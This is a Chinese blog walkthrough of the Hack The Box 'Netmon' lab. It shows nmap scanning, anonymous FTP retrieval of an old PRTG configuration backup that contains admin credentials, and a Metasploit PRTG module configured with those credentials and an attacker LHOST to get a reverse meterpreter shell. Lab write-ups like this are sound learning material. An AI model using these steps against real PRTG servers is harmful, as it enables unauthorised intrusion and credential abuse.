hack the box netmon靶机

本来看着这个靶机,觉得应该不难吧,结果还是看了不少东西才学会。按照惯例,先开扫

nmap -sV -Pn -A 10.10.10.152

在这里插入图片描述
这个地方有几个有用的信息,第一个,ftp匿名,第二个,80端口跑了服务。打开后,能看到以下页面,同时注意这个服务的名字,后面要找和这个名字相关的配置文件等等:
在这里插入图片描述

通过扫描的结果能知道ftp端口是能够匿名登录的,那我就不客气了,直接登录。注意注意,这个匿名登录也是要输入账户名的,账户名anonymous。(这个地方多说几句,我才开始匿名不输入,直接回车,我还想为啥登录不进去,我还打算用爆破ftp,而且还真在msf中让我找到了ftp的爆破模块。)

ftp 10.10.10.152

在这里插入图片描述
翻啊翻,在users/public/下面找到了user.txt。然后下载后,拿到user.txt的内容

get user.txt

在这里插入图片描述
按理论来说,拿到了ftp的内容,那我们就能遨游了,还能找找账户密码之类的文件。
但是这块找了半天也没找到什么东西,参考了一位大佬的文章
https://blog.csdn.net/weixin_45527786/article/details/105427388
能知道应该使用ls -la来查看隐藏的文件,同时在programdata隐藏文件夹下面有一个paessler文件夹中存了一个PRTG Network Monitor
文件夹,备份中的PRTG Configuration.old.bak是一个配置文件,get下载后,能找到账户名和密码,注意注意,这个文件夹有old,是个坑。
找到的账户和密码如下:
在这里插入图片描述
然后通过nmap的扫描,也能知道80端口是跑着服务的,我们拿到了账户名和密码,直接登录咯,然后发现密码错误!
通过提示看,应该是把后面的2018换成2019,怪不得叫old,真是脑洞不小。使用修改后的PrTg@dmin2019登录进去,好像也没啥用。就是一个告警的页面。
此时我就想,也许msf能帮帮我,去搜这个软件

search prtg

在这里插入图片描述
确实有,咱们使用起来,看看要配置什么。
在这里插入图片描述
配置用户名以及密码,还要配置主机的端口以及IP,以及本机使用的IP。直接配置上去

set ADMIN_PASSWORD PrTg@dmin2019
set ADMIN_USERNAME prtgadmin
set RHOSTS 10.10.10.152
set RPORT 80
set LHOST 10.10.14.30

在这里插入图片描述
直接开run,然后能拿到meterpreter,输入shell,启动shell。
在这里插入图片描述
因为是windows,然后在User/administrator/Desktop文件夹下面找到了root.txt,然后读取即可

type root.txt

在这里插入图片描述
结束。

不足:
1.msf才开始使用,有些东西不懂
2.old的套路挺有意思的

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值